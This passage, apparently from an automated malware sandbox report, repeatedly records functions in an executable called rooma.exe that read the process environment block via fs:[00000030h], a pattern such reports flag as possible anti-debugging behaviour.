          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015951ED mov eax, dword ptr fs:[00000030h]7_2_015951ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h]7_2_016411A4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h]7_2_016411A4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h]7_2_016411A4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h]7_2_016411A4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E7190 mov eax, dword ptr fs:[00000030h]7_2_015E7190
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h]7_2_0158A197
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h]7_2_0158A197
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h]7_2_0158A197
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D0185 mov eax, dword ptr fs:[00000030h]7_2_015D0185
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AB1B0 mov eax, dword ptr fs:[00000030h]7_2_015AB1B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h]7_2_0164C188
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h]7_2_0164C188
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161019F mov eax, dword ptr fs:[00000030h]7_2_0161019F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161019F mov eax, dword ptr fs:[00000030h]7_2_0161019F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161019F mov eax, dword ptr fs:[00000030h]7_2_0161019F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161019F mov eax, dword ptr fs:[00000030h]7_2_0161019F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665060 mov eax, dword ptr fs:[00000030h]7_2_01665060
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01592050 mov eax, dword ptr fs:[00000030h]7_2_01592050
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB052 mov eax, dword ptr fs:[00000030h]7_2_015BB052
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161106E mov eax, dword ptr fs:[00000030h]7_2_0161106E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D070 mov ecx, dword ptr fs:[00000030h]7_2_0160D070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BC073 mov eax, dword ptr fs:[00000030h]7_2_015BC073
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov ecx, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h]7_2_015A1070
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163705E mov ebx, dword ptr fs:[00000030h]7_2_0163705E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163705E mov eax, dword ptr fs:[00000030h]7_2_0163705E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h]7_2_015AE016
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h]7_2_015AE016
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h]7_2_015AE016
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h]7_2_015AE016
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165903E mov eax, dword ptr fs:[00000030h]7_2_0165903E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165903E mov eax, dword ptr fs:[00000030h]7_2_0165903E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165903E mov eax, dword ptr fs:[00000030h]7_2_0165903E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165903E mov eax, dword ptr fs:[00000030h]7_2_0165903E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A020 mov eax, dword ptr fs:[00000030h]7_2_0158A020
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158C020 mov eax, dword ptr fs:[00000030h]7_2_0158C020
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B90DB mov eax, dword ptr fs:[00000030h]7_2_015B90DB
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h]7_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h]7_2_0160D0C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h]7_2_0160D0C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158C0F0 mov eax, dword ptr fs:[00000030h]7_2_0158C0F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D20F0 mov ecx, dword ptr fs:[00000030h]7_2_015D20F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015980E9 mov eax, dword ptr fs:[00000030h]7_2_015980E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0158A0E3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016120DE mov eax, dword ptr fs:[00000030h]7_2_016120DE
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B50E4 mov eax, dword ptr fs:[00000030h]7_2_015B50E4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B50E4 mov ecx, dword ptr fs:[00000030h]7_2_015B50E4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016650D9 mov eax, dword ptr fs:[00000030h]7_2_016650D9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C909C mov eax, dword ptr fs:[00000030h]7_2_015C909C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h]7_2_015BD090
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h]7_2_015BD090
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01595096 mov eax, dword ptr fs:[00000030h]7_2_01595096
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159208A mov eax, dword ptr fs:[00000030h]7_2_0159208A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158D08D mov eax, dword ptr fs:[00000030h]7_2_0158D08D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016560B8 mov eax, dword ptr fs:[00000030h]7_2_016560B8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016560B8 mov ecx, dword ptr fs:[00000030h]7_2_016560B8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F367 mov eax, dword ptr fs:[00000030h]7_2_0164F367
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589353 mov eax, dword ptr fs:[00000030h]7_2_01589353
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589353 mov eax, dword ptr fs:[00000030h]7_2_01589353
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h]7_2_0158D34C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h]7_2_0158D34C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163437C mov eax, dword ptr fs:[00000030h]7_2_0163437C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665341 mov eax, dword ptr fs:[00000030h]7_2_01665341
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01612349 mov eax, dword ptr fs:[00000030h]7_2_01612349
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01597370 mov eax, dword ptr fs:[00000030h]7_2_01597370
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01597370 mov eax, dword ptr fs:[00000030h]7_2_01597370
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01597370 mov eax, dword ptr fs:[00000030h]7_2_01597370
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165A352 mov eax, dword ptr fs:[00000030h]7_2_0165A352
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov eax, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov eax, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov eax, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov ecx, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov eax, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161035C mov eax, dword ptr fs:[00000030h]7_2_0161035C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158C310 mov ecx, dword ptr fs:[00000030h]7_2_0158C310
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165132D mov eax, dword ptr fs:[00000030h]7_2_0165132D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165132D mov eax, dword ptr fs:[00000030h]7_2_0165132D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B0310 mov ecx, dword ptr fs:[00000030h]7_2_015B0310
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h]7_2_015CA30B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h]7_2_015CA30B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h]7_2_015CA30B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01587330 mov eax, dword ptr fs:[00000030h]7_2_01587330
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161930B mov eax, dword ptr fs:[00000030h]7_2_0161930B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161930B mov eax, dword ptr fs:[00000030h]7_2_0161930B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161930B mov eax, dword ptr fs:[00000030h]7_2_0161930B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF32A mov eax, dword ptr fs:[00000030h]7_2_015BF32A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F3E6 mov eax, dword ptr fs:[00000030h]7_2_0164F3E6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h]7_2_0159A3C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h]7_2_015983C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h]7_2_015983C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h]7_2_015983C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h]7_2_015983C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016653FC mov eax, dword ptr fs:[00000030h]7_2_016653FC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C63FF mov eax, dword ptr fs:[00000030h]7_2_015C63FF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164C3CD mov eax, dword ptr fs:[00000030h]7_2_0164C3CD
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h]7_2_015AE3F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h]7_2_015AE3F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h]7_2_015AE3F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h]7_2_015A03E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164B3D0 mov ecx, dword ptr fs:[00000030h]7_2_0164B3D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E739A mov eax, dword ptr fs:[00000030h]7_2_015E739A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E739A mov eax, dword ptr fs:[00000030h]7_2_015E739A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01588397 mov eax, dword ptr fs:[00000030h]7_2_01588397
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01588397 mov eax, dword ptr fs:[00000030h]7_2_01588397
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01588397 mov eax, dword ptr fs:[00000030h]7_2_01588397
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h]7_2_0158E388
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h]7_2_0158E388
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h]7_2_0158E388
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B438F mov eax, dword ptr fs:[00000030h]7_2_015B438F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B438F mov eax, dword ptr fs:[00000030h]7_2_015B438F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0166539D mov eax, dword ptr fs:[00000030h]7_2_0166539D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h]7_2_015C33A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h]7_2_015C33A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B33A5 mov eax, dword ptr fs:[00000030h]7_2_015B33A5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01596259 mov eax, dword ptr fs:[00000030h]7_2_01596259
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158A250 mov eax, dword ptr fs:[00000030h]7_2_0158A250
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h]7_2_0165D26B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h]7_2_0165D26B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640274 mov eax, dword ptr fs:[00000030h]7_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C724D mov eax, dword ptr fs:[00000030h]7_2_015C724D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589240 mov eax, dword ptr fs:[00000030h]7_2_01589240
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589240 mov eax, dword ptr fs:[00000030h]7_2_01589240
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h]7_2_015D1270
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h]7_2_015D1270
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B9274 mov eax, dword ptr fs:[00000030h]7_2_015B9274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h]7_2_0164B256
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h]7_2_0164B256
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158826B mov eax, dword ptr fs:[00000030h]7_2_0158826B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01594260 mov eax, dword ptr fs:[00000030h]7_2_01594260
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01594260 mov eax, dword ptr fs:[00000030h]7_2_01594260
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01594260 mov eax, dword ptr fs:[00000030h]7_2_01594260
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665227 mov eax, dword ptr fs:[00000030h]7_2_01665227
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h]7_2_015C7208
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h]7_2_015C7208
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158823B mov eax, dword ptr fs:[00000030h]7_2_0158823B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016652E2 mov eax, dword ptr fs:[00000030h]7_2_016652E2
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
